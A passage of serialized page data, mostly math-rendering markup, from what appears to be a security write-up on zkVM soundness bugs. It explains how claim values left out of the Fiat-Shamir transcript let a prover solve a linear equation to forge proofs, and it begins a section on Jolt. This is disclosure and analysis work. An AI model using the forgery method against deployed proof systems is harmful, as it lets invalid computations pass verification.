g":116,"props":114368,"children":114370},{"className":114369,"style":113867},[3710],[114371],{"type":28,"tag":116,"props":114372,"children":114373},{"style":21318},[114374,114378],{"type":28,"tag":116,"props":114375,"children":114377},{"className":114376,"style":3720},[3719],[],{"type":28,"tag":116,"props":114379,"children":114381},{"className":114380},[3725,3726,3727,3728],[114382],{"type":28,"tag":116,"props":114383,"children":114385},{"className":114384},[3680,21251,3728],[114386],{"type":33,"value":3408},{"type":28,"tag":116,"props":114388,"children":114390},{"className":114389},[21407],[114391],{"type":33,"value":21410},{"type":28,"tag":116,"props":114393,"children":114395},{"className":114394},[3705],[114396],{"type":28,"tag":116,"props":114397,"children":114399},{"className":114398,"style":114147},[3710],[114400],{"type":28,"tag":116,"props":114401,"children":114402},{},[],{"type":28,"tag":116,"props":114404,"children":114406},{"className":114405,"style":3798},[3759],[],{"type":28,"tag":116,"props":114408,"children":114410},{"className":114409},[3680,33],[114411],{"type":28,"tag":116,"props":114412,"children":114414},{"className":114413},[3680],[114415],{"type":33,"value":113753},{"type":28,"tag":116,"props":114417,"children":114419},{"className":114418,"style":92663},[3680],[114420],{"type":33,"value":2754},{"type":28,"tag":116,"props":114422,"children":114424},{"className":114423},[3680],[114425,114434],{"type":28,"tag":116,"props":114426,"children":114428},{"className":114427},[3680,33],[114429],{"type":28,"tag":116,"props":114430,"children":114432},{"className":114431},[3680],[114433],{"type":33,"value":76252},{"type":28,"tag":116,"props":114435,"children":114437},{"className":114436},[3695],[114438],{"type":28,"tag":116,"props":114439,"children":114441},{"className":114440},[3700,21305],[114442,114471],{"type":28,"tag":116,"props":114443,"children":114445},{"className":114444},[3705],[114446,114466],{"type":28,"tag":116,"props":114447,"children":114449},{"className":114448,"style":93192},[3710],[114450],{"type":28,"tag":116,"props":114451,"children":114452},{"style":113790},[114453,114457],{"type":28,"tag":116,"props":114454,"children":114456},{"className":114455,"style":3720},[3719],[],{"type":28,"tag":116,"props":114458,"children":114460},{"className":114459},[3725,3726,3727,3728],[114461],{"type":28,"tag":116,"props":114462,"children":114464},{"className":114463},[3680,21251,3728],[114465],{"type":33,"value":3408},{"type":28,"tag":116,"props":114467,"children":114469},{"className":114468},[21407],[114470],{"type":33,"value":21410},{"type":28,"tag":116,"props":114472,"children":114474},{"className":114473},[3705],[114475],{"type":28,"tag":116,"props":114476,"children":114478},{"className":114477,"style":92746},[3710],[114479],{"type":28,"tag":116,"props":114480,"children":114481},{},[],{"type":28,"tag":116,"props":114483,"children":114485},{"className":114484,"style":3857},[3759],[],{"type":28,"tag":116,"props":114487,"children":114489},{"className":114488},[3862],[114490],{"type":33,"value":373},{"type":28,"tag":116,"props":114492,"children":114494},{"className":114493,"style":3857},[3759],[],{"type":28,"tag":116,"props":114496,"children":114498},{"className":114497},[3669],[114499,114503],{"type":28,"tag":116,"props":114500,"children":114502},{"className":114501,"style":93694},[3674],[],{"type":28,"tag":116,"props":114504,"children":114506},{"className":114505},[3680],[114507],{"type":33,"value":353},{"type":33,"value":141},{"type":28,"tag":29,"props":114510,"children":114511},{},[114512,114517,114519,114525],{"type":28,"tag":4995,"props":114513,"children":114514},{},[114515],{"type":33,"value":114516},"Why this is vulnerable:",{"type":33,"value":114518}," The ",{"type":28,"tag":98,"props":114520,"children":114522},{"className":114521},[],[114523],{"type":33,"value":114524},"claimed_sum",{"type":33,"value":114526}," values are prover-supplied. If they're not in the transcript before challenges are derived, the prover can adjust them to make the sum zero for an invalid execution.",{"type":28,"tag":18457,"props":114528,"children":114529},{},[],{"type":28,"tag":63,"props":114531,"children":114533},{"id":114532},"the-universal-attack-pattern",[114534],{"type":33,"value":114535},"The Universal Attack Pattern",{"type":28,"tag":29,"props":114537,"children":114538},{},[114539],{"type":33,"value":114540},"Now we can describe the attack pattern that works on all six systems:",{"type":28,"tag":29,"props":114542,"children":114543},{},[114544],{"type":28,"tag":206,"props":114545,"children":114548},{"alt":114546,"src":114547},"2_attack_pattern","/posts/zkvms-unfaithful-claims/2_attack_pattern.svg",[],{"type":28,"tag":29,"props":114550,"children":114551},{},[114552,114554,114579],{"type":33,"value":114553},"When a value ",{"type":28,"tag":98,"props":114555,"children":114557},{"className":114556},[3652,3653],[114558],{"type":28,"tag":116,"props":114559,"children":114561},{"className":114560},[3658],[114562],{"type":28,"tag":116,"props":114563,"children":114565},{"className":114564,"ariaHidden":3664},[3663],[114566],{"type":28,"tag":116,"props":114567,"children":114569},{"className":114568},[3669],[114570,114574],{"type":28,"tag":116,"props":114571,"children":114573},{"className":114572,"style":21246},[3674],[],{"type":28,"tag":116,"props":114575,"children":114577},{"className":114576,"style":107858},[3680,21251],[114578],{"type":33,"value":108182},{"type":33,"value":114580}," isn't transcript-bound:",{"type":28,"tag":455,"props":114582,"children":114583},{},[114584,114615,114692,114837],{"type":28,"tag":459,"props":114585,"children":114586},{},[114587,114589,114614],{"type":33,"value":114588},"Challenges are fixed (independent of ",{"type":28,"tag":98,"props":114590,"children":114592},{"className":114591},[3652,3653],[114593],{"type":28,"tag":116,"props":114594,"children":114596},{"className":114595},[3658],[114597],{"type":28,"tag":116,"props":114598,"children":114600},{"className":114599,"ariaHidden":3664},[3663],[114601],{"type":28,"tag":116,"props":114602,"children":114604},{"className":114603},[3669],[114605,114609],{"type":28,"tag":116,"props":114606,"children":114608},{"className":114607,"style":21246},[3674],[],{"type":28,"tag":116,"props":114610,"children":114612},{"className":114611,"style":107858},[3680,21251],[114613],{"type":33,"value":108182},{"type":33,"value":1829},{"type":28,"tag":459,"props":114616,"children":114617},{},[114618,114620],{"type":33,"value":114619},"The verification equation has form: ",{"type":28,"tag":98,"props":114621,"children":114623},{"className":114622},[3652,3653],[114624],{"type":28,"tag":116,"props":114625,"children":114627},{"className":114626},[3658],[114628],{"type":28,"tag":116,"props":114629,"children":114631},{"className":114630,"ariaHidden":3664},[3663],[114632,114673],{"type":28,"tag":116,"props":114633,"children":114635},{"className":114634},[3669],[114636,114640,114645,114650,114655,114660,114664,114669],{"type":28,"tag":116,"props":114637,"children":114639},{"className":114638,"style":3780},[3674],[],{"type":28,"tag":116,"props":114641,"children":114643},{"className":114642,"style":95017},[3680,21251],[114644],{"type":33,"value":32719},{"type":28,"tag":116,"props":114646,"children":114648},{"className":114647},[21380],[114649],{"type":33,"value":313},{"type":28,"tag":116,"props":114651,"children":114653},{"className":114652,"style":107858},[3680,21251],[114654],{"type":33,"value":108182},{"type":28,"tag":116,"props":114656,"children":114658},{"className":114657},[21401],[114659],{"type":33,"value":1829},{"type":28,"tag":116,"props":114661,"children":114663},{"className":114662,"style":3857},[3759],[],{"type":28,"tag":116,"props":114665,"children":114667},{"className":114666},[3862],[114668],{"type":33,"value":373},{"type":28,"tag":116,"props":114670,"children":114672},{"className":114671,"style":3857},[3759],[],{"type":28,"tag":116,"props":114674,"children":114676},{"className":114675},[3669],[114677,114682],{"type":28,"tag":116,"props":114678,"children":114681},{"className":114679,"style":114680},[3674],"height:0.8095em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":114683,"children":114685},{"className":114684},[3680,33],[114686],{"type":28,"tag":116,"props":114687,"children":114689},{"className":114688},[3680],[114690],{"type":33,"value":114691},"target",{"type":28,"tag":459,"props":114693,"children":114694},{},[114695,114696,114722,114724],{"type":33,"value":7151},{"type":28,"tag":98,"props":114697,"children":114699},{"className":114698},[3652,3653],[114700],{"type":28,"tag":116,"props":114701,"children":114703},{"className":114702},[3658],[114704],{"type":28,"tag":116,"props":114705,"children":114707},{"className":114706,"ariaHidden":3664},[3663],[114708],{"type":28,"tag":116,"props":114709,"children":114711},{"className":114710},[3669],[114712,114717],{"type":28,"tag":116,"props":114713,"children":114716},{"className":114714,"style":114715},[3674],"height:0.8889em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":114718,"children":114720},{"className":114719,"style":95017},[3680,21251],[114721],{"type":33,"value":32719},{"type":33,"value":114723}," is linear: ",{"type":28,"tag":98,"props":114725,"children":114727},{"className":114726},[3652,3653],[114728],{"type":28,"tag":116,"props":114729,"children":114731},{"className":114730},[3658],[114732],{"type":28,"tag":116,"props":114733,"children":114735},{"className":114734,"ariaHidden":3664},[3663],[114736,114765,114792,114820],{"type":28,"tag":116,"props":114737,"children":114739},{"className":114738},[3669],[114740,114745,114752,114756,114761],{"type":28,"tag":116,"props":114741,"children":114744},{"className":114742,"style":114743},[3674],"height:0.4445em;",[],{"type":28,"tag":116,"props":114746,"children":114749},{"className":114747,"style":114748},[3680,21251],"margin-right:0.0037em;",[114750],{"type":33,"value":114751},"α",{"type":28,"tag":116,"props":114753,"children":114755},{"className":114754,"style":3760},[3759],[],{"type":28,"tag":116,"props":114757,"children":114759},{"className":114758},[3765],[114760],{"type":33,"value":110922},{"type":28,"tag":116,"props":114762,"children":114764},{"className":114763,"style":3760},[3759],[],{"type":28,"tag":116,"props":114766,"children":114768},{"className":114767},[3669],[114769,114774,114779,114783,114788],{"type":28,"tag":116,"props":114770,"children":114773},{"className":114771,"style":114772},[3674],"height:0.7667em;vertical-align:-0.0833em;",[],{"type":28,"tag":116,"props":114775,"children":114777},{"className":114776,"style":107858},[3680,21251],[114778],{"type":33,"value":108182},{"type":28,"tag":116,"props":114780,"children":114782},{"className":114781,"style":3760},[3759],[],{"type":28,"tag":116,"props":114784,"children":114786},{"className":114785},[3765],[114787],{"type":33,"value":2268},{"type":28,"tag":116,"props":114789,"children":114791},{"className":114790,"style":3760},[3759],[],{"type":28,"tag":116,"props":114793,"children":114795},{"className":114794},[3669],[114796,114800,114807,114811,114816],{"type":28,"tag":116,"props":114797,"children":114799},{"className":114798,"style":114715},[3674],[],{"type":28,"tag":116,"props":114801,"children":114804},{"className":114802,"style":114803},[3680,21251],"margin-right:0.05278em;",[114805],{"type":33,"value":114806},"β",{"type":28,"tag":116,"props":114808,"children":114810},{"className":114809,"style":3857},[3759],[],{"type":28,"tag":116,"props":114812,"children":114814},{"className":114813},[3862],[114815],{"type":33,"value":373},{"type":28,"tag":116,"props":114817,"children":114819},{"className":114818,"style":3857},[3759],[],{"type":28,"tag":116,"props":114821,"children":114823},{"className":114822},[3669],[114824,114828],{"type":28,"tag":116,"props":114825,"children":114827},{"className":114826,"style":114680},[3674],[],{"type":28,"tag":116,"props":114829,"children":114831},{"className":114830},[3680,33],[114832],{"type":28,"tag":116,"props":114833,"children":114835},{"className":114834},[3680],[114836],{"type":33,"value":114691},{"type":28,"tag":459,"props":114838,"children":114839},{},[114840,114842],{"type":33,"value":114841},"Solve: ",{"type":28,"tag":98,"props":114843,"children":114845},{"className":114844},[3652,3653],[114846],{"type":28,"tag":116,"props":114847,"children":114849},{"className":114848},[3658],[114850],{"type":28,"tag":116,"props":114851,"children":114853},{"className":114852,"ariaHidden":3664},[3663],[114854,114880,114915],{"type":28,"tag":116,"props":114855,"children":114857},{"className":114856},[3669],[114858,114862,114867,114871,114876],{"type":28,"tag":116,"props":114859,"children":114861},{"className":114860,"style":21246},[3674],[],{"type":28,"tag":116,"props":114863,"children":114865},{"className":114864,"style":107858},[3680,21251],[114866],{"type":33,"value":108182},{"type":28,"tag":116,"props":114868,"children":114870},{"className":114869,"style":3857},[3759],[],{"type":28,"tag":116,"props":114872,"children":114874},{"className":114873},[3862],[114875],{"type":33,"value":373},{"type":28,"tag":116,"props":114877,"children":114879},{"className":114878,"style":3857},[3759],[],{"type":28,"tag":116,"props":114881,"children":114883},{"className":114882},[3669],[114884,114888,114893,114902,114906,114911],{"type":28,"tag":116,"props":114885,"children":114887},{"className":114886,"style":3780},[3674],[],{"type":28,"tag":116,"props":114889,"children":114891},{"className":114890},[21380],[114892],{"type":33,"value":313},{"type":28,"tag":116,"props":114894,"children":114896},{"className":114895},[3680,33],[114897],{"type":28,"tag":116,"props":114898,"children":114900},{"className":114899},[3680],[114901],{"type":33,"value":114691},{"type":28,"tag":116,"props":114903,"children":114905},{"className":114904,"style":3760},[3759],[],{"type":28,"tag":116,"props":114907,"children":114909},{"className":114908},[3765],[114910],{"type":33,"value":3739},{"type":28,"tag":116,"props":114912,"children":114914},{"className":114913,"style":3760},[3759],[],{"type":28,"tag":116,"props":114916,"children":114918},{"className":114917},[3669],[114919,114923,114928,114933,114938],{"type":28,"tag":116,"props":114920,"children":114922},{"className":114921,"style":3780},[3674],[],{"type":28,"tag":116,"props":114924,"children":114926},{"className":114925,"style":114803},[3680,21251],[114927],{"type":33,"value":114806},{"type":28,"tag":116,"props":114929,"children":114931},{"className":114930},[21401],[114932],{"type":33,"value":1829},{"type":28,"tag":116,"props":114934,"children":114936},{"className":114935},[3680],[114937],{"type":33,"value":4250},{"type":28,"tag":116,"props":114939,"children":114941},{"className":114940,"style":114748},[3680,21251],[114942],{"type":33,"value":114751},{"type":28,"tag":29,"props":114944,"children":114945},{},[114946],{"type":33,"value":114947},"In the simplest linear case, forging reduces to solving a low-dimensional field equation, while other systems require small coupled systems.",{"type":28,"tag":29,"props":114949,"children":114950},{},[114951,114953,115031],{"type":33,"value":114952},"For systems with multiple unbound values, we get a system of linear equations. Gaussian elimination solves it in ",{"type":28,"tag":98,"props":114954,"children":114956},{"className":114955},[3652,3653],[114957],{"type":28,"tag":116,"props":114958,"children":114960},{"className":114959},[3658],[114961],{"type":28,"tag":116,"props":114962,"children":114964},{"className":114963,"ariaHidden":3664},[3663],[114965],{"type":28,"tag":116,"props":114966,"children":114968},{"className":114967},[3669],[114969,114974,114980,114985,115026],{"type":28,"tag":116,"props":114970,"children":114973},{"className":114971,"style":114972},[3674],"height:1.0641em;vertical-align:-0.25em;",[],{"type":28,"tag":116,"props":114975,"children":114977},{"className":114976,"style":92663},[3680,21251],[114978],{"type":33,"value":114979},"O",{"type":28,"tag":116,"props":114981,"children":114983},{"className":114982},[21380],[114984],{"type":33,"value":313},{"type":28,"tag":116,"props":114986,"children":114988},{"className":114987},[3680],[114989,114994],{"type":28,"tag":116,"props":114990,"children":114992},{"className":114991},[3680,21251],[114993],{"type":33,"value":56022},{"type":28,"tag":116,"props":114995,"children":114997},{"className":114996},[3695],[114998],{"type":28,"tag":116,"props":114999,"children":115001},{"className":115000},[3700],[115002],{"type":28,"tag":116,"props":115003,"children":115005},{"className":115004},[3705],[115006],{"type":28,"tag":116,"props":115007,"children":115009},{"className":115008,"style":3675},[3710],[115010],{"type":28,"tag":116,"props":115011,"children":115012},{"style":3714},[115013,115017],{"type":28,"tag":116,"props":115014,"children":115016},{"className":115015,"style":3720},[3719],[],{"type":28,"tag":116,"props":115018,"children":115020},{"className":115019},[3725,3726,3727,3728],[115021],{"type":28,"tag":116,"props":115022,"children":115024},{"className":115023},[3680,3728],[115025],{"type":33,"value":16957},{"type":28,"tag":116,"props":115027,"children":115029},{"className":115028},[21401],[115030],{"type":33,"value":1829},{"type":33,"value":115032}," field operations. For non-linear constraints, we might need to use some more advanced techniques like resultants and Groebner bases.",{"type":28,"tag":18457,"props":115034,"children":115035},{},[],{"type":28,"tag":63,"props":115037,"children":115039},{"id":115038},"the-six-broken-systems",[115040],{"type":33,"value":115041},"The Six Broken Systems",{"type":28,"tag":29,"props":115043,"children":115044},{},[115045],{"type":28,"tag":206,"props":115046,"children":115049},{"alt":115047,"src":115048},"3_six_broken_systems","/posts/zkvms-unfaithful-claims/3_six_broken_systems.svg",[],{"type":28,"tag":29,"props":115051,"children":115052},{},[115053],{"type":33,"value":115054},"Now let's see how this plays out in each system. We'll go deep on the first one (Jolt) to establish the pattern, then focus on what's unique about each subsequent system.",{"type":28,"tag":18457,"props":115056,"children":115057},{},[],{"type":28,"tag":75,"props":115059,"children":115061},{"id":115060},"jolt-a16z",[115062],{"type":33,"value":115063},"Jolt (a16z)",{"type":28,"tag":29,"props":115065,"children":115066},{},[115067],{"type":33,"value":115068},"Jolt is a zkVM for RISC-V programs, built by a16z. It uses sumcheck extensively to verify execution constraints.",{"type":28,"tag":29,"props":115070,"children":115071},{},[115072],{"type":28,"tag":4995,"props":115073,"children":115074},{},[115075],{"type":33,"value":115076},"The proof structure:",{"type":28,"tag":234,"props":115078,"children":115080},{"code":115079},"JoltProof {\n    commitments: Vec\u003CCommitment>,           // Polynomial commitments to trace\n    opening_claims: Map\u003COpeningId, Claim>,  // \u003C- THE VULNERABLE VALUES\n    proofs: Map\u003CStage, SumcheckProof>,      // Sumcheck and opening proofs\n    ...\n}\n",[115081],{"type":28,"tag":98,"props":115082,"children":115083},{"__ignoreMap":7},[115084],{"type":33,"value":115079},{"type":28,"tag":29,"props":115086,"children":115087},{},[115088],{"type":28,"tag":4995,"props":115089,"children":115090},{},[115091],{"type":33,"value":115092},"The verification flow:",{"type":28,"tag":29,"props":115094,"children":115095},{},[115096],{"type":28,"tag":206,"props":115097,"children":115100},{"alt":115098,"src":115099},"4_jolt_verification_flow","/posts/zkvms-unfaithful-claims/4_jolt_verification_flow.svg",[],{"type":28,"tag":29,"props":115102,"children":115103},{},[115104,115109,115111,115117,115119,115125,115127,115132],{"type":28,"tag":4995,"props":115105,"children":115106},{},[115107],{"type":33,"value":115108},"The bug:",{"type":33,"value":115110}," Each sumcheck instance provides an ",{"type":28,"tag":98,"props":115112,"children":115114},{"className":115113},[],[115115],{"type":33,"value":115116},"input_claim",{"type":33,"value":115118},", which is the value the polynomial allegedly sums to over the Boolean hypercube. These claims come from ",{"type":28,"tag":98,"props":115120,"children":115122},{"className":115121},[],[115123],{"type":33,"value":115124},"opening_claims",{"type":33,"value":115126}," in the proof, but they were ",{"type":28,"tag":4995,"props":115128,"children":115129},{},[115130],{"type":33,"value":115131},"never absorbed into the transcript",{"type":33,"value":115133}," before the batching coefficients were derived.",{"type":28,"tag":29,"props":115135,"children":115136},{},[115137],{"type":28,"tag":206,"props":115138,"children":115141},{"alt":115139,"src":115140},"5_jolt_flow","/posts/zkvms-unfaithful-claims/5_jolt_flow.svg",[],{"type":28,"tag":29,"props":115143,"children":115144},{},[115145],{"type":28,"tag":4995,"props":115146,"children":115147},{},[115148],{"type":33,"value":115149},"How sumcheck uses opening_claims:",{"type":28,"tag":29,"props":115151,"children":115152},{},[115153,115155,115161,115163,115240],{"type":33,"value":115154},"In Jolt's batched sumcheck, the verifier computes a target value ",{"type":28,"tag":98,"props":115156,"children":115158},{"className":115157},[],[115159],{"type":33,"value":115160},"BatchedClaim",{"type":33,"value":115162}," by taking a random linear combination of the individual claims ",{"type":28,"tag":98,"props":115164,"children":115166},{"className":115165},[3652,3653],[115167],{"type":28,"tag":116,"props":115168,"children":115170},{"className":115169},[3658],[115171],{"type":28,"tag":116,"props":115172,"children":115174},{"className":115173,"ariaHidden":3664},[3663],[115175],{"type":28,"tag":116,"props":115176,"children":115178},{"className":115177},[3669],[115179,115183],{"type":28,"tag":116,"props":115180,"children":115182},{"className":115181,"style":110657},[3674],[],{"type":28,"tag":116,"props":115184,"children":115186},{"className":115185},[3680],[115187,115192],{"type":28,"tag":116,"props":115188,"children":115190},{"className":115189,"style":92897},[3680,21251],[115191],{"type":33,"value":92900},{"type":28,"tag":116,"props":115193,"children":115195},{"className":115194},[3695],[115196],{"type":28,"tag":116,"props":115197,"children":115199},{"className":115198},[3700,21305],[115200,115229],{"type":28,"tag":116,"props":115201,"children":115203},{"className":115202},[3705],[115204,115224],{"type":28,"tag":116,"props":115205,"children":115207},{"className":115206,"style":93192},[3710],[115208],{"type":28,"tag":116,"props":115209,"children":115210},{"style":110089},[115211,115215],{"type":28,"tag":116,"props":115212,"children":115214},{"className":115213,"style":3720},[3719],[],{"type":28,"tag":116,"props":115216,"children":115218},{"className":115217},[3725,3726,3727,3728],[115219],{"type":28,"tag":116,"props":115220,"children":115222},{"className":115221},[3680,21251,3728],[115223],{"type":33,"value":3408},{"type":28,"tag":116,"props":115225,"children":115227},{"className":115226},[21407],[115228],{"type":33,"value":21410},{"type":28,"tag":116,"props":115230,"children":115232},{"className":115231},[3705],[115233],{"type":28,"tag":116,"props":115234,"children":115236},{"className":115235,"style":92746},[3710],[115237],{"type":28,"tag":116,"props":115238,"children":115239},{},[],{"type":33,"value":4160},{"type":28,"tag":29,"props":115242,"children":115243},{},[115244],{"type":28,"tag":98,"props":115245,"children":115247},{"className":115246},[3652,3653],[115248],{"type":28,"tag":116,"props":115249,"children":115251},{"className":115250},[3658],[115252],{"type":28,"tag":116,"props":115253,"children":115255},{"className":115254,"ariaHidden":3664},[3663],[115256,115286,115427],{"type":28,"tag":116,"props":115257,"children":115259},{"className":115258},[3669],[115260,115264,115273,115277,115282],{"type":28,"tag":116,"props":115261,"children":115263},{"className":115262,"style":92578},[3674],[],{"type":28,"tag":116,"props":115265,"children":115267},{"className":115266},[3680,33],[115268],{"type":28,"tag":116,"props":115269,"children":115271},{"className":115270},[3680],[115272],{"type":33,"value":115160},{"type":28,"tag":116,"props":115274,"children":115276},{"className":115275,"style":3857},[3759],[],{"type":28,"tag":116,"props":115278,"children":115280},{"className":115279},[3862],[115281],{"type":33,"value":373},{"type":28,"tag":116,"props":115283,"children":115285},{"className":115284,"style":3857},[3759],[],{"type":28,"tag":116,"props":115287,"children":115289},{"className":115288},[3669],[115290,115295,115352,115356,115414,115418,115423],{"type":28,"tag":116,"props":115291,"children":115294},{"className":115292,"style":115293},[3674],"height:1.0497em;vertical-align:-0.2997em;",[],{"type":28,"tag":116,"props":115296,"children":115298},{"className":115297},[21287],[115299,115304],{"type":28,"tag":116,"props":115300,"children":115302},{"className":115301,"style":21294},[21287,21292,21293],[115303],{"type":33,"value":108455},{"type":28,"tag":116,"props":115305,"children":115307},{"className":115306},[3695],[115308],{"type":28,"tag":116,"props":115309,"children":115311},{"className":115310},[3700,21305],[115312,115341],{"type":28,"tag":116,"props":115313,"children":115315},{"className":115314},[3705],[115316,115336],{"type":28,"tag":116,"props":115317,"children":115319},{"className":115318,"style":113867},[3710],[115320],{"type":28,"tag":116,"props":115321,"children":115322},{"style":21318},[115323,115327],{"type":28,"tag":116,"props":115324,"children":115326},{"className":115325,"style":3720},[3719],[],{"type":28,"tag":116,"props":115328,"children":115330},{"className":115329},[3725,3726,3727,3728],[115331],{"type":28,"tag":116,"props":115332,"children":115334},{"className":115333},[3680,21251,3728],[115335],{"type":33,"value":3408},{"type":28,"tag":116,"props":115337,"children":115339},{"className":115338},[21407],[115340],{"type":33,"value":21410},{"type":28,"tag":116,"props":115342,"children":115344},{"className":115343},[3705],[115345],{"type":28,"tag":116,"props":115346,"children":115348},{"className":115347,"style":114147},[3710],[115349],{"type":28,"tag":116,"props":115350,"children":115351},{},[],{"type":28,"tag":116,"props":115353,"children":115355},{"className":115354,"style":3798},[3759],[],{"type":28,"tag":116,"props":115357,"children":115359},{"className":115358},[3680],[115360,115365],{"type":28,"tag":116,"props":115361,"children":115363},{"className":115362,"style":114748},[3680,21251],[115364],{"type":33,"value":114751},{"type":28,"tag":116,"props":115366,"children":115368},{"className":115367},[3695],[115369],{"type":28,"tag":116,"props":115370,"children":115372},{"className":115371},[3700,21305],[115373,115403],{"type":28,"tag":116,"props":115374,"children":115376},{"className":115375},[3705],[115377,115398],{"type":28,"tag":116,"props":115378,"children":115380},{"className":115379,"style":93192},[3710],[115381],{"type":28,"tag":116,"props":115382,"children":115384},{"style":115383},"top:-2.55em;margin-left:-0.0037em;margin-right:0.05em;",[115385,115389],{"type":28,"tag":116,"props":115386,"children":115388},{"className":115387,"style":3720},[3719],[],{"type":28,"tag":116,"props":115390,"children":115392},{"className":115391},[3725,3726,3727,3728],[115393],{"type":28,"tag":116,"props":115394,"children":115396},{"className":115395},[3680,21251,3728],[115397],{"type":33,"value":3408},{"type":28,"tag":116,"props":115399,"children":115401},{"className":115400},[21407],[115402],{"type":33,"value":21410},{"type":28,"tag":116,"props":115404,"children":115406},{"className":115405},[3705],[115407],{"type":28,"tag":116,"props":115408,"children":115410},{"className":115409,"style":92746},[3710],[115411],{"type":28,"tag":116,"props":115412,"children":115413},{},[],{"type":28,"tag":116,"props":115415,"children":115417},{"className":115416,"style":3760},[3759],[],{"type":28,"tag":116,"props":115419,"children":115421},{"className":115420},[3765],[115422],{"type":33,"value":110922},{"type":28,"tag":116,"props":115424,"children":115426},{"className":115425,"style":3760},[3759],[],{"type":28,"tag":116,"props":115428,"children":115430},{"className":115429},[3669],[115431,115435],{"type":28,"tag":116,"props":115432,"children":115434},{"className":115433,"style":110657},[3674],[],{"type":28,"tag":116,"props":115436,"children":115438},{"className":115437},[3680],[115439,115444],{"type":28,"tag":116,"props":115440,"children":115442},{"className":115441,"style":92897},[3680,21251],[115443],{"type":33,"value":92900},{"type":28,"tag":116,"props":115445,"children":115447},{"className":115446},[3695],[115448],{"type":28,"tag":116,"props":115449,"children":115451},{"className":115450},[3700,21305],[115452,115481],{"type":28,"tag":116,"props":115453,"children":115455},{"className":115454},[3705],[115456,115476],{"type":28,"tag":116,"props":115457,"children":115459},{"className":115458,"style":93192},[3710],[115460],{"type":28,"tag":116,"props":115461,"children":115462},{"style":110089},[115463,115467],{"type":28,"tag":116,"props":115464,"children":115466},{"className":115465,"style":3720},[3719],[],{"type":28,"tag":116,"props":115468,"children":115470},{"className":115469},[3725,3726,3727,3728],[115471],{"type":28,"tag":116,"props":115472,"children":115474},{"className":115473},[3680,21251,3728],[115475],{"type":33,"value":3408},{"type":28,"tag":116,"props":115477,"children":115479},{"className":115478},[21407],[115480],{"type":33,"value":21410},{"type":28,"tag":116,"props":115482,"children":115484},{"className":115483},[3705],[115485],{"type":28,"tag":116,"props":115486,"children":115488},{"className":115487,"style":92746},[3710],[115489],{"type":28,"tag":116,"props":115490,"children":115491},{},[],{"type":28,"tag":29,"props":115493,"children":115494},{},[115495,115497,115574,115576,115581,115583,115660,115662,115739,115741,115818],{"type":33,"value":115496},"where ",{"type":28,"tag":98,"props":115498,"children":115500},{"className":115499},[3652,3653],[115501],{"type":28,"tag":116,"props":115502,"children":115504},{"className":115503},[3658],[115505],{"type":28,"tag":116,"props":115506,"children":115508},{"className":115507,"ariaHidden":3664},[3663],[115509],{"type":28,"tag":116,"props":115510,"children":115512},{"className":115511},[3669],[115513,115517],{"type":28,"tag":116,"props":115514,"children":115516},{"className":115515,"style":109630},[3674],[],{"type":28,"tag":116,"props":115518,"children":115520},{"className":115519},[3680],[115521,115526],{"type":28,"tag":116,"props":115522,"children":115524},{"className":115523,"style":114748},[3680,21251],[115525],{"type":33,"value":114751},{"type":28,"tag":116,"props":115527,"children":115529},{"className":115528},[3695],[115530],{"type":28,"tag":116,"props":115531,"children":115533},{"className":115532},[3700,21305],[115534,115563],{"type":28,"tag":116,"props":115535,"children":115537},{"className":115536},[3705],[115538,115558],{"type":28,"tag":116,"props":115539,"children":115541},{"className":115540,"style":93192},[3710],[115542],{"type":28,"tag":116,"props":115543,"children":115544},{"style":115383},[115545,115549],{"type":28,"tag":116,"props":115546,"children":115548},{"className":115547,"style":3720},[3719],[],{"type":28,"tag":116,"props":115550,"children":115552},{"className":115551},[3725,3726,3727,3728],[115553],{"type":28,"tag":116,"props":115554,"children":115556},{"className":115555},[3680,21251,3728],[115557],{"type":33,"value":3408},{"type":28,"tag":116,"props":115559,"children":115561},{"className":115560},[21407],[115562],{"type":33,"value":21410},{"type":28,"tag":116,"props":115564,"children":115566},{"className":115565},[3705],[115567],{"type":28,"tag":116,"props":115568,"children":115570},{"className":115569,"style":92746},[3710],[115571],{"type":28,"tag":116,"props":115572,"children":115573},{},[],{"type":33,"value":115575}," are random coefficients derived from the transcript. Since ",{"type":28,"tag":98,"props":115577,"children":115579},{"className":115578},[],[115580],{"type":33,"value":115124},{"type":33,"value":115582}," (containing ",{"type":28,"tag":98,"props":115584,"children":115586},{"className":115585},[3652,3653],[115587],{"type":28,"tag":116,"props":115588,"children":115590},{"className":115589},[3658],[115591],{"type":28,"tag":116,"props":115592,"children":115594},{"className":115593,"ariaHidden":3664},[3663],[115595],{"type":28,"tag":116,"props":115596,"children":115598},{"className":115597},[3669],[115599,115603],{"type":28,"tag":116,"props":115600,"children":115602},{"className":115601,"style":110657},[3674],[],{"type":28,"tag":116,"props":115604,"children":115606},{"className":115605},[3680],[115607,115612],{"type":28,"tag":116,"props":115608,"children":115610},{"className":115609,"style":92897},[3680,21251],[115611],{"type":33,"value":92900},{"type":28,"tag":116,"props":115613,"children":115615},{"className":115614},[3695],[115616],{"type":28,"tag":116,"props":115617,"children":115619},{"className":115618},[3700,21305],[115620,115649],{"type":28,"tag":116,"props":115621,"children":115623},{"className":115622},[3705],[115624,115644],{"type":28,"tag":116,"props":115625,"children":115627},{"className":115626,"style":93192},[3710],[115628],{"type":28,"tag":116,"props":115629,"children":115630},{"style":110089},[115631,115635],{"type":28,"tag":116,"props":115632,"children":115634},{"className":115633,"style":3720},[3719],[],{"type":28,"tag":116,"props":115636,"children":115638},{"className":115637},[3725,3726,3727,3728],[115639],{"type":28,"tag":116,"props":115640,"children":115642},{"className":115641},[3680,21251,3728],[115643],{"type":33,"value":3408},{"type":28,"tag":116,"props":115645,"children":115647},{"className":115646},[21407],[115648],{"type":33,"value":21410},{"type":28,"tag":116,"props":115650,"children":115652},{"className":115651},[3705],[115653],{"type":28,"tag":116,"props":115654,"children":115656},{"className":115655,"style":92746},[3710],[115657],{"type":28,"tag":116,"props":115658,"children":115659},{},[],{"type":33,"value":115661},") were not in the transcript, the 